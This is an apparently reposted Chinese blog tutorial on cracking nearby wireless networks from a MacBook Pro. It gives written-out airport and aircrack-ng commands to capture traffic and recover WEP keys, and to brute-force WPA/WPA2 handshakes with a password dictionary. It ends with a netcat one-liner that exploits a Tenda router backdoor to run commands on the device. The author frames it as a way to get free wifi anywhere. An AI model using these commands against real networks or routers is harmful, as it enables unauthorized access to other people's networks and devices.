• 利用MacBookPro入侵无线网络


    目前无线网络的加密方式主要有WEP,WPA/WPA2。这是最常看到的加密方式,最近由于需要,专门去研究了一下如何入侵无线网络。

    1、入侵WEP加密的无线网络

    WEP加密方式现在已经很不安全了,因为只要通过一定量的数据包,就可以穷举出密码,无论密码多么复杂,也最多需要几分钟而已。

    WEP的秘钥分为5位和13位。

    入侵主要流程:

    1)先查看附近的wifi信号

    airport -s

    2)选定其中一个wifi信号,看到其所在的频道,开始监听抓包

    sudo airport en0 sniff 11

    en0 代表无线网卡,11代表要监听的无线信号在11频道上,此时笔记本进入了监听阶段,抓到的包保存为/tmp/airportSniffxxxxx.cap

    3)此时我们可以一边抓包,一边进行解密

    aircrack-ng -1 -a 1 -e xx:xx:xx:xx:xx:xx /tmp/airportSniffxxxxx.cap

    -e 代表目的MAC地址

    -a 1 代表使用WEP破解方式

    只要包到达了一定数量,密码很快就出来了。

    注:对于13位的WEP,需要等多的数据包,例外,在数据包足够多时,但是又破解不出来的时候,可以尝试下提高 -f 影响因子的大小(默认为2),可以尝试提高到1024等。

    2、入侵WPA/WPA2加密的无线网络

    WPA/WPA2相对于WEP来说安全了很多,但是也存在着很大的隐患,虽然不会像WEP那样通过数据包直接分析出来了,但是需要获得了一次handshake,就可以用过字典暴力破解的方法获得秘钥。现在网上不管是弱密码还是已有的泄露的密码,都能找到很多,搜集整理出来一份很好地字典就能走到哪里都有无线可以蹭了。

    入侵主要流程:

    1)先查看附近的wifi信号

    airport -s

    2)选定其中一个wifi信号,看到其所在的频道,开始监听抓包

    sudo airport en0 sniff 11

    en0 代表无线网卡,11代表要监听的无线信号在11频道上,此时笔记本进入了监听阶段,抓到的包保存为/tmp/airportSniffxxxxx.cap

    3)此时我们可以一边抓包,一边进行解密

    aircrack-ng -w password.txt -e xx:xx:xx:xx:xx:xx /tmp/airportSniffxxxxx.cap

    -w 后面代表字典文件

    只要拥有一个handshake,就可以开始跑字典破解了。handshake是在监听阶段,有用户重新连接到无线上,就是一个handshake。

    3、Tenda路由器后门利用

    echo -ne "w302r_mfgx00x/bin/ls" | nc -u -q 5 192.168.0.1 7329

    漏洞原理及利用:http://netsecurity.51cto.com/art/201310/413552.htm

  • 相关阅读:
    人月神话--没有银弹软件工程中的根本和次要问题(No Silver Bullet Essence and Accident in Software Engineering)
    人与人之间最难得是合作,组件与组件之间最难得时协作。
    关注软件构架与软件构架师
    软件产品本质是逻辑或者说事概念产品
    为什么需求分析离不开系统逻辑模型
    MySQL中varchar最大长度是多少?【转】
    WCF自定义授权[转自小庄的博客]
    PetShop的系统架构设计[转]
    百练 2734 十进制到八进制 解题报告
    百练 2818 密码
  • 原文地址:https://www.cnblogs.com/dgy5554/p/3973404.html
Copyright © 2020-2023  润新知